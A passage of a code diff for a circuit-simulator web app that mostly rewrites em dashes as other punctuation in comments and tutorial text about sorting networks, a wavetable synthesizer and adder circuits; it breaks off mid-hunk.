@@ -10,7 +10,7 @@ import { Comparator, Constant, HexDisplay, Input, Mux, Register } from '@simten/
 import type { BlogCircuit } from '../types';
 
 // ── Compare-and-swap subcircuit ──
-// Outputs min on `lo`, max on `hi` — unconditionally, no branching.
+// Outputs min on `lo`, max on `hi`, unconditionally and with no branching.
 // cmp.lt=1 means a < b, so lo=a (in1), hi=b (in1).
 const CompareSwap = circuit('CompareSwap', {
   inputs: { a: bus(8), b: bus(8) },
@@ -110,7 +110,7 @@ export const SortDemo = circuit('SortDemo', {
 
 // ── Pipelined 4-element sort network ──
 // Same 5 comparators as SortNet4, but register banks between each stage
-// make inputs and outputs independent — a new result emerges every clock cycle
+// make inputs and outputs independent, so a new result emerges every clock cycle
 // after 3 cycles of initial latency.
 export const PipelinedSortNet4 = circuit('PipelinedSortNet4', {
   inputs: { v0: bus(8), v1: bus(8), v2: bus(8), v3: bus(8) },
@@ -204,7 +204,7 @@ export const SORTING_CIRCUITS: Record<string, BlogCircuit> = {
   compareSwapDemo: {
     name: 'Compare-and-Swap',
     description:
-      'Two inputs enter, the smaller exits on `lo` and the larger on `hi`. No branches — a Comparator drives two Muxes.',
+      'Two inputs enter, the smaller exits on `lo` and the larger on `hi`. No branches: a Comparator drives two Muxes.',
     circuit: CompareSwapDemo,
   },
 

--- a/apps/web/src/features/blog/sorting-networks/sections/CompareSwapSection.tsx
+++ b/apps/web/src/features/blog/sorting-networks/sections/CompareSwapSection.tsx
@@ -20,7 +20,7 @@ export function CompareSwapSection() {
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           There is no branch instruction deciding which path to take. A <code>Comparator</code>{' '}
           asserts its <code>lt</code> output when <code>a &lt; b</code>, and that single bit drives
-          two <code>Mux</code> nodes &mdash; one to route the minimum, one to route the maximum. The
+          two <code>Mux</code> nodes: one to route the minimum, one to route the maximum. The
           circuit evaluates in parallel every cycle regardless of the values flowing through it.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">

--- a/apps/web/src/features/blog/sorting-networks/sections/HeroSection.tsx
+++ b/apps/web/src/features/blog/sorting-networks/sections/HeroSection.tsx
@@ -6,9 +6,9 @@ export function HeroSection() {
           Sorting Networks
         </h1>
         <p className="mt-6 text-xl text-gray-500 dark:text-gray-300 leading-relaxed">
-          A fixed wiring of comparators that sorts any input in the same number of steps &mdash; no
-          branches, no loops, just parallel hardware. The algorithm behind network switch fabrics,
-          GPU sort, and median filters.
+          A fixed wiring of comparators that sorts any input in the same number of steps, with no
+          branches and no loops, just parallel hardware. The algorithm behind network switch
+          fabrics, GPU sort, and median filters.
         </p>
         <div className="mt-8 flex items-center gap-4 text-sm text-gray-500 dark:text-gray-400">
           <span>Interactive tutorial</span>

--- a/apps/web/src/features/blog/sorting-networks/sections/NetworkSection.tsx
+++ b/apps/web/src/features/blog/sorting-networks/sections/NetworkSection.tsx
@@ -34,20 +34,20 @@ export function NetworkSection() {
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Each pair notation <em>(i, j)</em> means &ldquo;compare elements at positions <em>i</em>{' '}
           and <em>j</em>; put the smaller at <em>i</em>.&rdquo; Pairs in the same stage have no data
-          dependencies so they run simultaneously &mdash; the hardware evaluates all of Stage
-          1&rsquo;s comparators at once, then all of Stage 2&rsquo;s, then Stage 3.
+          dependencies so they run simultaneously: the hardware evaluates all of Stage 1&rsquo;s
+          comparators at once, then all of Stage 2&rsquo;s, then Stage 3.
         </p>
 
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           The intuition behind why it works: Stage 1 sorts each pair independently (the two
-          &ldquo;halves&rdquo;). Stage 2 merges the minimums together and the maximums together
-          &mdash; after it, positions 0 and 3 already hold the global minimum and maximum. Stage 3
-          fixes the only remaining disorder: positions 1 and 2.
+          &ldquo;halves&rdquo;). Stage 2 merges the minimums together and the maximums together, and
+          after it positions 0 and 3 already hold the global minimum and maximum. Stage 3 fixes the
+          only remaining disorder: positions 1 and 2.
         </p>
 
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          Change any of the four input values below. The outputs update instantly &mdash; this
-          circuit has no clock, no loop, and no conditional logic anywhere.
+          Change any of the four input values below. The outputs update instantly, and this circuit
+          has no clock, no loop, and no conditional logic anywhere.
         </p>
       </div>
 

--- a/apps/web/src/features/blog/sorting-networks/sections/PipelineSection.tsx
+++ b/apps/web/src/features/blog/sorting-networks/sections/PipelineSection.tsx
@@ -5,7 +5,7 @@ import { PipelinedSortDemo } from '../circuits';
 export function PipelineSection() {
   const sim = useCircuitSimulator(PipelinedSortDemo);
 
-  // Read output values from portValues — keys are like "sorter.s0", "sorter.s1", etc.
+  // Read output values from portValues; keys are like "sorter.s0", "sorter.s1", etc.
   const getOutputValue = (key: string): number => {
     if (!sim.portValues) return 0;
     const direct = sim.portValues.get(key);
@@ -27,9 +27,9 @@ export function PipelineSection() {
       <h2 className="text-3xl font-bold text-gray-900 dark:text-white mb-4">Adding a Pipeline</h2>
       <div className="prose-invert space-y-6">
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          The combinational network above sorts instantly &mdash; but it can only process one set of
-          inputs at a time. While the comparators are busy evaluating one frame of values, no new
-          data can enter.
+          The combinational network above sorts instantly, but it can only process one set of inputs
+          at a time. While the comparators are busy evaluating one frame of values, no new data can
+          enter.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           The fix is straightforward: insert a <strong>register bank</strong> between each
@@ -39,8 +39,8 @@ export function PipelineSection() {
           that.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          The first sorted result takes 3 clock cycles to emerge &mdash; one per stage. But after
-          that initial latency, a new sorted result arrives <strong>every single cycle</strong>.
+          The first sorted result takes 3 clock cycles to emerge, one per stage. But after that
+          initial latency, a new sorted result arrives <strong>every single cycle</strong>.
           Throughput is 1 sort/cycle regardless of how long the combinational logic inside each
           stage takes. This is exactly how real FPGA and ASIC sort engines are built.
         </p>
@@ -87,7 +87,7 @@ export function PipelineSection() {
                 </div>
                 {sim.cycleCount >= 3 && (
                   <span className="ml-auto text-xs font-medium text-green-600 dark:text-green-400 bg-green-100 dark:bg-green-900/30 px-2 py-1 rounded">
-                    Pipeline full &mdash; 1 sort/cycle
+                    Pipeline full &middot; 1 sort/cycle
                   </span>
                 )}
               </div>

--- a/apps/web/src/features/blog/sorting-networks/sections/WhyHardwareSection.tsx
+++ b/apps/web/src/features/blog/sorting-networks/sections/WhyHardwareSection.tsx
@@ -12,7 +12,7 @@ export function WhyHardwareSection() {
           unpredictable, and pipelining across the sort boundary is difficult.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          A sorting network sidesteps all of that. The wiring is fixed at design time &mdash; no
+          A sorting network sidesteps all of that. The wiring is fixed at design time, with no
           control flow, no memory access pattern that depends on the data. Every comparator in each
           stage evaluates in parallel. The depth of the network (the number of sequential stages) is
           O(log&sup2; <em>n</em>), so a 16-element Batcher network needs only 10 stages. Timing is
@@ -37,16 +37,16 @@ export function WhyHardwareSection() {
           <strong className="text-gray-900 dark:text-white">GPU sort pipelines</strong> (Bitonic
           sort, Odd-even merge sort) use sorting networks as the inner kernel. A wavefront of
           threads each owns a small slice; the fixed compare-and-swap pattern maps cleanly onto SIMD
-          lanes because every thread executes the same instruction at the same time &mdash; no
-          divergence, maximum throughput.
+          lanes because every thread executes the same instruction at the same time, so there is no
+          divergence and maximum throughput.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Finally, a pipelined sorting network achieves sustained throughput of{' '}
           <strong className="text-gray-900 dark:text-white">one sort per clock cycle</strong>. Add a
           register stage between each comparator layer and you can feed a new set of values every
           tick. Our 4-element network has 3 stages, so after 3 cycles of latency the first sorted
-          result arrives &mdash; and then one arrives every cycle thereafter. Software can never
-          match that for fixed-size inputs.
+          result arrives, and then one arrives every cycle thereafter. Software can never match that
+          for fixed-size inputs.
         </p>
       </div>
     </section>

--- a/apps/web/src/features/blog/sorting-networks/useSortingSimulator.ts
+++ b/apps/web/src/features/blog/sorting-networks/useSortingSimulator.ts
@@ -3,7 +3,7 @@ import { SortDemo } from './circuits';
 
 /**
  * Hook for the sorting networks demo circuit.
- * Purely combinational — no clock ticks needed.
+ * Purely combinational, so no clock ticks needed.
  * Exposes `sim` and a helper to read the sorted output values.
  */
 export function useSortingSimulator() {

--- a/apps/web/src/features/blog/synth-in-hardware/Scope.tsx
+++ b/apps/web/src/features/blog/synth-in-hardware/Scope.tsx
@@ -4,7 +4,7 @@ import { useEffect, useRef } from 'react';
  * Draws the circuit's output port as a waveform.
  *
  * This is the same `audio` net the speakers are fed from, so the shape on
- * screen is literally the sound — not a visualisation of it.
+ * screen is literally the sound, not a visualisation of it.
  */
 export function Scope({ samples, className }: { samples: Float32Array; className?: string }) {
   const canvasRef = useRef<HTMLCanvasElement | null>(null);

--- a/apps/web/src/features/blog/synth-in-hardware/circuits.ts
+++ b/apps/web/src/features/blog/synth-in-hardware/circuits.ts
@@ -10,7 +10,7 @@
  * That matters beyond tidiness: a `Constant` is hardwired once this is
  * synthesised, so a knob built on one exists only in the simulator and vanishes
  * on the way to an FPGA. As ports they are real signals, identical in the
- * browser, under Verilator, and on the board — and changing one costs nothing,
+ * browser, under Verilator, and on the board. Changing one costs nothing,
  * since inputs are already passed with every render request.
  *
  * That includes the waveform. All four tables live in one ROM, addressed by
@@ -48,7 +48,7 @@ export const DEFAULT_ENV_STEP = 8;
 /**
  * Band-limited wave: summing `1/k · sin(k·θ)` over a fixed harmonic count keeps
  * every partial under Nyquist. That is the difference between "vintage digital"
- * and aliasing mush at 22 kHz — a naive sawtooth folds its upper harmonics back
+ * and aliasing mush at 22 kHz: a naive sawtooth folds its upper harmonics back
  * down as inharmonic clangour.
  *
  * `oddOnly` gives a square/hollow character (odd harmonics only), matching how
@@ -67,7 +67,7 @@ function bandLimited(harmonics: number, oddOnly = false): number[] {
   return raw.map((v) => Math.round(((v / peak) * 0.5 + 0.5) * 255));
 }
 
-/** Order matters — the index is what the `wave` input selects. */
+/** Order matters: the index is what the `wave` input selects. */
 export const WAVES = ['sine', 'triangle', 'square', 'saw'] as const;
 export type WaveName = (typeof WAVES)[number];
 
@@ -83,7 +83,7 @@ function waveBank(): number[] {
   return WAVES.flatMap((name) => GENERATORS[name]());
 }
 
-/** Phase increment for a frequency — the accumulator wraps once per cycle. */
+/** Phase increment for a frequency; the accumulator wraps once per cycle. */
 export const incFor = (hz: number) => Math.round((hz * 65536) / SAMPLE_RATE);
 
 export function buildVoice() {
@@ -93,7 +93,7 @@ export function buildVoice() {
       inc: bus(16),
       /** One tick high restarts the envelope. */
       trig: bit,
-      /** Which of the four tables to read — the bank's high address bits. */
+      /** Which of the four tables to read: the bank's high address bits. */
       wave: bus(2),
       /** Subtracted from the envelope each tick, so bigger decays faster. */
       decay: bus(16),
@@ -106,7 +106,7 @@ export function buildVoice() {
       // Top TABLE_BITS of the phase index within a table; the low bits are the
       // fractional part, discarded (zero-order hold, as the era did it).
       tabAddr: BitSlice({ low: 16 - TABLE_BITS, high: 15 }),
-      // addr = (wave << 12) | phase[15:4] — the selector picks the bank.
+      // addr = (wave << 12) | phase[15:4], so the selector picks the bank.
       bankShift: LeftShifter({ width: 16 }),
       bankAdd: Adder({ width: 16 }),
       rom: ROM({ memory: romFromBytes(waveBank()) }),

--- a/apps/web/src/features/blog/synth-in-hardware/sections/CircuitSection.tsx
+++ b/apps/web/src/features/blog/synth-in-hardware/sections/CircuitSection.tsx
@@ -1,6 +1,6 @@
 /**
  * Explains the circuit shown live in PlayerSection. Deliberately has no canvas
- * of its own — a second, static copy of the same diagram would compete with the
+ * of its own: a second, static copy of the same diagram would compete with the
  * running one, and the running one is the point.
  */
 export function CircuitSection() {
@@ -12,7 +12,7 @@ export function CircuitSection() {
           Sixteen nodes. A register and an adder make the phase accumulator: every tick it adds{' '}
           <code>inc</code> to itself and wraps at 2<sup>16</sup>, so <code>inc</code> is the pitch.
           The top twelve bits index the wavetable, and the four discarded bits are the fractional
-          part &mdash; a zero-order hold, exactly the shortcut the era took.
+          part. That is a zero-order hold, exactly the shortcut the era took.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           The table holds 0&ndash;255, so a subtractor recentres it to two&rsquo;s complement before
@@ -28,10 +28,9 @@ export function CircuitSection() {
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Nothing above is a setting in the page. <code>wave</code> and <code>decay</code> are input
-          ports, so changing one drives a signal into the circuit on the next tick &mdash; the same
-          way a knob on a real synth does. Had they been <code>Constant</code> nodes they would have
-          been hardwired the moment this was synthesised, and the knobs would exist only in the
-          browser.
+          ports, so changing one drives a signal into the circuit on the next tick, the same way a
+          knob on a real synth does. Had they been <code>Constant</code> nodes they would have been
+          hardwired the moment this was synthesised, and the knobs would exist only in the browser.
         </p>
       </div>
     </section>

--- a/apps/web/src/features/blog/synth-in-hardware/sections/HeroSection.tsx
+++ b/apps/web/src/features/blog/synth-in-hardware/sections/HeroSection.tsx
@@ -7,8 +7,8 @@ export function HeroSection() {
         </h1>
         <p className="mt-6 text-xl text-gray-500 dark:text-gray-300 leading-relaxed">
           A 16-bit counter, a table of numbers and one multiplier. No oscillator object, no filter
-          node &mdash; every sample you hear is computed by a circuit you can open up, and the same
-          netlist runs on an FPGA.
+          node. Every sample you hear is computed by a circuit you can open up, and the same netlist
+          runs on an FPGA.
         </p>
         <div className="mt-8 flex items-center gap-4 text-sm text-gray-500 dark:text-gray-400">
           <span>Interactive tutorial</span>

--- a/apps/web/src/features/blog/synth-in-hardware/sections/PlayerSection.tsx
+++ b/apps/web/src/features/blog/synth-in-hardware/sections/PlayerSection.tsx
@@ -21,7 +21,7 @@ export function PlayerSection() {
   const [decay, setDecay] = useState(DEFAULT_ENV_STEP);
 
   // Passed explicitly: the canvas otherwise sniffs a `dark` class off <html>,
-  // and this app tracks theme in a provider instead — so it rendered light on
+  // and this app tracks theme in a provider instead, so it rendered light on
   // a dark page.
   const { resolvedTheme } = useTheme();
 
@@ -37,14 +37,14 @@ export function PlayerSection() {
       <div className="prose-invert space-y-6">
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           One simulation drives everything below. The trace is the circuit&rsquo;s{' '}
-          <code>audio</code> output, sample by sample; the speakers are fed from the same net. Not a
-          visualisation of the sound &mdash; the sound.
+          <code>audio</code> output, sample by sample; the speakers are fed from the same net. It is
+          not a visualisation of the sound. It is the sound.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Both controls are <strong>input ports on the circuit</strong>, not settings in the page.
-          Changing one sets a signal on the next clock tick &mdash; nothing recompiles, nothing
-          reloads. The same two ports exist when this is exported to Verilog, so the knobs survive
-          onto an FPGA.
+          Changing one sets a signal on the next clock tick. Nothing recompiles, nothing reloads.
+          The same two ports exist when this is exported to Verilog, so the knobs survive onto an
+          FPGA.
         </p>
       </div>
 
@@ -64,7 +64,7 @@ export function PlayerSection() {
         <div className="border-t border-gray-200 dark:border-gray-800 p-4">
           <Scope samples={scope} className="w-full h-24 block" />
           <div className="mt-1 text-xs text-gray-500 dark:text-gray-400 tabular-nums">
-            audio &mdash; {sim.cycleCount.toLocaleString()} ticks elapsed
+            audio &middot; {sim.cycleCount.toLocaleString()} ticks elapsed
           </div>
         </div>
 
@@ -135,11 +135,10 @@ export function PlayerSection() {
 
       <p className="mt-5 text-xs text-gray-500 dark:text-gray-400 leading-relaxed">
         All four waveforms live in one ROM, laid end to end, and <code>wave</code> supplies the two
-        high address bits &mdash; so picking a timbre is choosing which bank the phase accumulator
-        reads from. Each table is band-limited: only the harmonics that fit under the Nyquist
-        frequency are summed. Generate a sawtooth the naive way at 22 kHz and its upper harmonics
-        fold back down as inharmonic clangour, which is a property of the table rather than of the
-        circuit.
+        high address bits, so picking a timbre is choosing which bank the phase accumulator reads
+        from. Each table is band-limited: only the harmonics that fit under the Nyquist frequency
+        are summed. Generate a sawtooth the naive way at 22 kHz and its upper harmonics fold back
+        down as inharmonic clangour, which is a property of the table rather than of the circuit.
       </p>
     </section>
   );

--- a/apps/web/src/features/blog/synth-in-hardware/useLiveVoice.ts
+++ b/apps/web/src/features/blog/synth-in-hardware/useLiveVoice.ts
@@ -10,10 +10,11 @@
  * 22,050 intermediate values. One `tick` call per sample would be that many
  * round trips a second.
  *
- * The AudioContext has to live here — workers and iframes have no Web Audio —
- * so this asks for chunks and schedules each against `AudioContext.currentTime`
- * rather than a wall-clock timer. Keeping `LEAD_SECONDS` queued means a late
- * frame (GC, a React render, layout) costs nothing.
+ * The AudioContext has to live here, because workers and iframes have no Web
+ * Audio. It asks for chunks and schedules each against
+ * `AudioContext.currentTime` rather than a wall-clock timer. Keeping
+ * `LEAD_SECONDS` queued means a late frame (GC, a React render, layout) costs
+ * nothing.
  */
 
 import type { useCircuitSimulator } from '@simten/embed';
@@ -24,14 +25,14 @@ import { BEAT_SAMPLES, incFor, SAMPLE_RATE, SCORE } from './circuits';
 const FULL_SCALE = 16256;
 /** How far ahead of the playhead to stay queued. */
 const LEAD_SECONDS = 0.2;
-/** Requested chunk — kept under a note's length so inputs are constant for it. */
+/** Requested chunk, kept under a note's length so inputs are constant for it. */
 const CHUNK_SAMPLES = 1024;
 const SCOPE_SAMPLES = 1024;
 
 type Simulator = ReturnType<typeof useCircuitSimulator>;
 
 export interface VoiceControls {
-  /** Index into WAVES — the ROM bank the phase is read from. */
+  /** Index into WAVES: the ROM bank the phase is read from. */
   wave: number;
   /** Subtracted from the envelope each tick; bigger decays faster. */
   decay: number;
@@ -41,7 +42,7 @@ export function useLiveVoice(sim: Simulator, controls: VoiceControls) {
   const ctxRef = useRef<AudioContext | null>(null);
   const nextStartRef = useRef(0);
   /** requestAnimationFrame handle for the pump. rAF rather than a timer
-   *  because it does not fire in a hidden tab — the page stops working when
+   *  because it does not fire in a hidden tab, so the page stops working when
    *  nobody is looking at it, with no event to miss and nothing to poll. */
   const pumpRef = useRef<number | null>(null);
   const playingRef = useRef(false);
@@ -52,7 +53,7 @@ export function useLiveVoice(sim: Simulator, controls: VoiceControls) {
   const [playing, setPlaying] = useState(false);
   const [scope, setScope] = useState<Float32Array<ArrayBuffer>>(new Float32Array(SCOPE_SAMPLES));
 
-  // Controls are plain inputs, so nothing here reacts to them changing — the
+  // Controls are plain inputs, so nothing here reacts to them changing. The
   // next render request simply carries the new values. No rebuild, no ROM
   // flash, no gap. A ref keeps the pump reading current values without
   // restarting it on every slider move.
@@ -65,7 +66,7 @@ export function useLiveVoice(sim: Simulator, controls: VoiceControls) {
     const note = SCORE[pos.note];
     const remaining = note.beats * BEAT_SAMPLES - pos.sample;
 
-    // trig is high for the first sample of a note only — a one-tick gate, so it
+    // trig is high for the first sample of a note only, a one-tick gate, so it
     // gets a run of its own.
     const count = pos.sample === 0 ? 1 : Math.min(CHUNK_SAMPLES, remaining);
     const raw = await sim.renderSamples('audio', count, {
@@ -93,7 +94,7 @@ export function useLiveVoice(sim: Simulator, controls: VoiceControls) {
   const play = useCallback(() => {
     // Cancel any existing pump first. Overwriting `pumpRef` would orphan the
     // old loop, which then reschedules itself forever with nothing holding a
-    // handle to it — two pumps racing on one score position, unstoppable.
+    // handle to it: two pumps racing on one score position, unstoppable.
     if (pumpRef.current !== null) cancelAnimationFrame(pumpRef.current);
     pumpRef.current = null;
 

--- a/apps/web/src/features/docs/CustomCompositionDemo.tsx
+++ b/apps/web/src/features/docs/CustomCompositionDemo.tsx
@@ -3,7 +3,7 @@
  * tier 2 (CircuitEmbed + onPortValuesChange) and tier 4 (full composition
  * via useCircuitSimulator + CircuitCanvas).
  *
- * Self-contained — defines its own HalfAdder, doesn't rely on any
+ * Self-contained: defines its own HalfAdder, doesn't rely on any
  * /learn-page modules. Keeps the docs page reproducible in isolation.
  */
 
@@ -56,7 +56,7 @@ export function Tier2EmbedWithCallback() {
         <CircuitEmbed
           circuit={HalfAdder}
           title="Half adder"
-          description="Toggle the switches — the truth table row follows."
+          description="Toggle the switches, and the truth table row follows."
           onPortValuesChange={setPortValues}
         />
       </div>
@@ -76,7 +76,7 @@ export function Tier2EmbedWithCallback() {
  * Tier 4 demo: deliberately *no* CircuitCanvas. Renders the same
  * HalfAdder circuit, but the frontend is custom toggle buttons +
  * styled LED indicators + the truth table. Same sim, completely
- * different UI — shows that the canvas is optional; the simulator
+ * different UI: shows that the canvas is optional; the simulator
  * is just an engine you can build any visualization on top of.
  *
  * Mirrors the Snake demo in miniature: circuit = engine, React =

--- a/apps/web/src/features/docs/PipelineVisualizer.tsx
+++ b/apps/web/src/features/docs/PipelineVisualizer.tsx
@@ -103,7 +103,7 @@ export function PipelineVisualizer() {
         const circuitMap = new Map(allCircuits.map((c) => [c.name, c]));
         const resolveCircuit = (name: string) => circuitMap.get(name);
 
-        // Build primitive name list from stdlib (safe — no new Function())
+        // Build primitive name list from stdlib (safe: no new Function())
         const prims = STDLIB_CIRCUITS.map((c) => c.circuit) as Circuit[];
         const primNames = prims.map((p) => p.name);
 
@@ -180,8 +180,8 @@ export function PipelineVisualizer() {
             <p className="text-sm text-gray-400 mb-3">
               The TypeScript source defines two components.{' '}
               <code className="text-blue-400">HalfAdder</code> is a composite used inside{' '}
-              <code className="text-blue-400">FullAdder</code>. This is just text — no compilation
-              has happened yet.
+              <code className="text-blue-400">FullAdder</code>. This is just text, with no
+              compilation has happened yet.
             </p>
             <pre className="text-xs font-mono text-gray-300 bg-gray-950 rounded-lg p-4 overflow-x-auto leading-relaxed max-h-80 overflow-y-auto">
               {FULL_ADDER_SOURCE}
@@ -193,8 +193,8 @@ export function PipelineVisualizer() {
           <div>
             <p className="text-sm text-gray-400 mb-3">
               The <code className="text-blue-400">executeCircuitCode()</code> call produces{' '}
-              <code className="text-blue-400">Circuit</code> objects. The FullAdder has 3 nodes —
-              two HalfAdders and one Or gate. The HalfAdders are still composites at this stage.
+              <code className="text-blue-400">Circuit</code> objects. The FullAdder has 3 nodes, two
+              HalfAdders and one Or gate. The HalfAdders are still composites at this stage.
             </p>
             <div className="space-y-3">
               <div className="text-xs text-gray-500 font-mono">
@@ -415,8 +415,8 @@ export function PipelineVisualizer() {
         {activeTab === 'live' && (
           <div>
             <p className="text-sm text-gray-400 mb-3">
-              The simulator runs the numeric circuit. Toggle the switches to change inputs — values
-              propagate through the event queue until the circuit stabilizes.
+              The simulator runs the numeric circuit. Toggle the switches to change inputs, and
+              values propagate through the event queue until the circuit stabilizes.
             </p>
             <CircuitEmbed
               circuit={buildFromIR(compiled.fullAdder, compiled.circuits)}

--- a/apps/web/src/features/docs/PropagationDemo.tsx
+++ b/apps/web/src/features/docs/PropagationDemo.tsx
@@ -54,19 +54,19 @@ function describeStep(step: PropagationStep): string {
   }
 
   if (id.includes('switch')) {
-    return `Source node — outputs initial value. No inputs to read.`;
+    return `Source node: outputs initial value. No inputs to read.`;
   }
   if (id.includes('led')) {
-    return `Reads input value and updates display.${!step.changed ? ' Output unchanged — no dependents enqueued.' : ''}`;
+    return `Reads input value and updates display.${!step.changed ? ' Output unchanged, no dependents enqueued.' : ''}`;
   }
   if (id.includes('xor')) {
-    return `Reads two inputs, computes XOR.${step.changed ? ' Output changed — enqueuing dependents.' : ' Output unchanged.'}`;
+    return `Reads two inputs, computes XOR.${step.changed ? ' Output changed, enqueuing dependents.' : ' Output unchanged.'}`;
   }
   if (id.includes('and')) {
-    return `Reads two inputs, computes AND.${step.changed ? ' Output changed — enqueuing dependents.' : ' Output unchanged.'}`;
+    return `Reads two inputs, computes AND.${step.changed ? ' Output changed, enqueuing dependents.' : ' Output unchanged.'}`;
   }
   if (id.includes('or')) {
-    return `Reads two inputs, computes OR.${step.changed ? ' Output changed — enqueuing dependents.' : ' Output unchanged.'}`;
+    return `Reads two inputs, computes OR.${step.changed ? ' Output changed, enqueuing dependents.' : ' Output unchanged.'}`;
   }
   return `Evaluating node.${step.changed ? ' Output changed.' : ' Output unchanged.'}`;
 }
@@ -197,9 +197,7 @@ export function PropagationDemo() {
               </span>
             ))
           ) : (
-            <span className="text-[10px] text-gray-600 font-mono">
-              empty — propagation complete
-            </span>
+            <span className="text-[10px] text-gray-600 font-mono">empty, propagation complete</span>
           )}
           {currentStep && currentStep.changed && currentStep.enqueued.length > 0 && (
             <>

--- a/apps/web/src/features/docs/examples.mdx
+++ b/apps/web/src/features/docs/examples.mdx
@@ -49,7 +49,7 @@ export const halfAdderDisplay = `const HalfAdder = circuit('HalfAdder', {
 
 ## Full Adder
 
-Three bits (a + b + carry in) → sum + carry out. Reuses HalfAdder as a composite — the simulator expands it to primitives automatically.
+Three bits (a + b + carry in) → sum + carry out. Reuses HalfAdder as a composite, and the simulator expands it to primitives automatically.
 
 export const fullAdderCode = `
 const HalfAdder = circuit('HalfAdder', {
@@ -100,7 +100,7 @@ export const fullAdderDisplay = `const FullAdder = circuit('FullAdder', {
   height={280}
   showControls
   title="Full Adder"
-  description="Toggle switches — notice how carry-in affects the output"
+  description="Toggle switches, and notice how carry-in affects the output"
 />
 
 ## Counter
@@ -193,10 +193,10 @@ export const fibDisplay = `const Fibonacci = circuit('Fibonacci', {
 
 ## Design Patterns
 
-**Combinational** — no state, no clock. Outputs computed directly from inputs. Examples: gates, adders, muxes, ALUs.
+**Combinational**: no state, no clock. Outputs computed directly from inputs. Examples: gates, adders, muxes, ALUs.
 
-**Sequential** — has state and clock. State updates on rising clock edge, outputs reflect current state. Examples: counters, registers, shift registers.
+**Sequential**: has state and clock. State updates on rising clock edge, outputs reflect current state. Examples: counters, registers, shift registers.
 
-**Hierarchical composition** — build complex circuits from simpler ones. FullAdder from HalfAdder, ALU from Adder+Mux, CPU from ALU+RegisterFile+Memory.
+**Hierarchical composition**: build complex circuits from simpler ones. FullAdder from HalfAdder, ALU from Adder+Mux, CPU from ALU+RegisterFile+Memory.
 
-**Feedback loops** — connect a node's output back to its input through a register. The register breaks the combinational loop by introducing a one-cycle delay. This is how counters, state machines, and CPUs work.
+**Feedback loops**: connect a node's output back to its input through a register. The register breaks the combinational loop by introducing a one-cycle delay. This is how counters, state machines, and CPUs work.

--- a/apps/web/src/features/learn/abstraction/circuits.ts
+++ b/apps/web/src/features/learn/abstraction/circuits.ts
@@ -60,7 +60,7 @@ const FullAdder = circuit('FullAdder', {
 });
 
 // ── Section 2: same circuit, two ways ──────────────────────────────────
-// Flat half-adder — XOR and AND wired directly. No subcircuit.
+// Flat half-adder: XOR and AND wired directly. No subcircuit.
 
 const FlatHalfAdderDemo = circuit('FlatHalfAdderDemo', {
   nodes: {
@@ -79,7 +79,7 @@ const FlatHalfAdderDemo = circuit('FlatHalfAdderDemo', {
   ],
 });
 
-// Encapsulated half-adder — uses the named HalfAdder subcircuit.
+// Encapsulated half-adder: uses the named HalfAdder subcircuit.
 
 const EncapsulatedHalfAdderDemo = circuit('EncapsulatedHalfAdderDemo', {
   nodes: {
@@ -97,8 +97,8 @@ const EncapsulatedHalfAdderDemo = circuit('EncapsulatedHalfAdderDemo', {
   ],
 });
 
-// ── Section 3: building up — full adder, two ways ──────────────────────
-// Flat full adder — all five gates exposed (two XOR, two AND, one OR).
+// ── Section 3: building up, full adder two ways ──────────────────────
+// Flat full adder: all five gates exposed (two XOR, two AND, one OR).
 
 const FlatFullAdderDemo = circuit('FlatFullAdderDemo', {
   nodes: {
@@ -129,7 +129,7 @@ const FlatFullAdderDemo = circuit('FlatFullAdderDemo', {
   ],
 });
 
-// Composed full adder — two HalfAdder subcircuits + an OR. Same behavior.
+// Composed full adder: two HalfAdder subcircuits + an OR. Same behavior.
 
 const ComposedFullAdderDemo = circuit('ComposedFullAdderDemo', {
   nodes: {
@@ -149,9 +149,9 @@ const ComposedFullAdderDemo = circuit('ComposedFullAdderDemo', {
   ],
 });
 
-// ── Section 4: scaling — an 8-bit adder built from FullAdders ──────────
+// ── Section 4: scaling, an 8-bit adder built from FullAdders ──────────
 // A real composed multi-bit adder. The "flat" version would have 40+
-// gates with criss-crossing carry wires — we don't render that; the
+// gates with criss-crossing carry wires, and we don't render that; the
 // prose makes the legibility argument, and the composed version below
 // is the proof. Uses Splitter8to8/Combiner8to8 to bridge the bus(8)
 // external ports to/from the bit-level full-adder chain inside.
@@ -244,22 +244,22 @@ const EightBitAdderDemo = circuit('EightBitAdderDemo', {
 
 export const ABSTRACTION_CIRCUITS = {
   flatHalfAdder: {
-    name: 'Half adder — gates exposed',
+    name: 'Half adder, gates exposed',
     description: 'XOR and AND wired directly. Same behavior as the encapsulated version below.',
     circuit: FlatHalfAdderDemo,
   },
   encapsulatedHalfAdder: {
-    name: 'Half adder — encapsulated',
+    name: 'Half adder, encapsulated',
     description: "Same circuit, named as a single 'HalfAdder' node. Behavior identical.",
     circuit: EncapsulatedHalfAdderDemo,
   },
   flatFullAdder: {
-    name: 'Full adder — five gates exposed',
+    name: 'Full adder, five gates exposed',
     description: 'Two XORs, two ANDs, one OR. The whole structure visible at once.',
     circuit: FlatFullAdderDemo,
   },
   composedFullAdder: {
-    name: 'Full adder — composed from half adders',
+    name: 'Full adder, composed from half adders',
     description:
       'Two HalfAdder subcircuits and one OR gate. Same five gates inside, organized into three named pieces.',
     circuit: ComposedFullAdderDemo,

--- a/apps/web/src/features/learn/abstraction/sections/BuildingUpSection.tsx
+++ b/apps/web/src/features/learn/abstraction/sections/BuildingUpSection.tsx
@@ -12,9 +12,9 @@ export function BuildingUpSection() {
       </h2>
       <div className="prose-invert space-y-6">
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          A full adder adds three bits &mdash; <code>a</code>, <code>b</code>, and a carry-in. Built
+          A full adder adds three bits: <code>a</code>, <code>b</code>, and a carry-in. Built
